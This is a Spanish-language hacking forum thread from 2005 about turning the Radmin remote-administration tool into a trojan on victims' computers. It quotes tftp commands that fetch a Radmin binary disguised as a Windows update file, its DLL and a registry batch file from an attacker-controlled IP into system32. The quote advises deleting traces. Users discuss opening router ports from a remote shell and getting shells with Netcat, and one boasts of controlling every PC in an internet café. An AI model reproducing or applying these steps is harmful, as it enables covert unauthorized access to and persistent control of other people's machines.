Troyanizando Radmin 2.1 control remoto

Iniciado por octalh, 4 Febrero 2005, 11:59 AM

0 Miembros y 1 Visitante están viendo este tema.

Kasswed

Citarlla

Ya Ya Ya Ya Ya Ya Ya

Seguramente sea porque el router, al actuar de firewall, tiene el puerto cerrado. Abre el puerto del Radmin en el router y prueba a ver.

Saludos!
"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.

Isirius

Alguien sabe como abrir el puerto del router teniendo una shell.
Gracias .

Kasswed

Pues puedes hacerle desde la shell un telnet a la IP de enlace, normalmente 192.168.1.1. Y desde ahi pues ya está, egun el modelo del router las opciones cambian, investigalas y ya esta...

Saludos!
"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.

Chrono17

oye q bien! ahora con esta ayuda tengo control sobre todo el cyber, y aunq en mi casa hay un PC, puedo controlarlo desde el cyber gracias...

Salu2

Chrono17

sargantana

Wenas

Citar7.-Subir archivos via tftp

una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:

Citar
tftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe
este es el radmin ya debidamente camuflageado

Citar
tftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll
la dll del radmin, no le cambien el nombre

Citar
tftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat
este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)

ahora solo basta con ejecutar el bat desde la shell y ya tendremos todo listo para el proximo reinicio, pero como nosotros somos muy impacientes y no podemos aguantar hasta el prox reinicio....


Una cuenta remota hay q con seguir antes? :'( alguna forma facil de conseguirla? la ip xxxxxxxxx seria la mia?

o se hace dsd la ventana dl ms2 q teniamos abierta antes... en tal caso m dice q  tftp\udp servicio desconocido

carlipus

yo solo puedo hacerlo ocn Netcat con Radmin no puedo.
He echo todos los pasos escritos en el manual de troyanizar Radmin y no me funciona...como veo algunos de ustedes tampoco les va.. :( Quien lo haga funcionar bien que lo diga! :P
Saludos.

sargantana


carlipus

#57
especifica mas...
Si te refieres con Netcat, LEE el manual que hay o los manuales..que hay en este foro...no se molestan en leer..lean 1º, luego las dudas que tengan preguntenlan...

Saludos

carlipus

#58
sargantana....no me mandes privados diciendome que tienes que hacer pa  conseguir shell con Netcat
PONLO AQUI

Y te vuelvo a repetir...LEETE EL MANUAL QUE HAY EN ESTE FORO SOBRE NETCAT, leiendote eso te quedará mas claro todo...ok?¿?¿

bajate esto http://personal.telefonica.terra.es/web/alexb/manus/Shell.con.Netcat.by.zhyzura.zip

slimet

tamadre... por mas que lo intento me sale: can`t connect to the server....
segui paso a paso los datos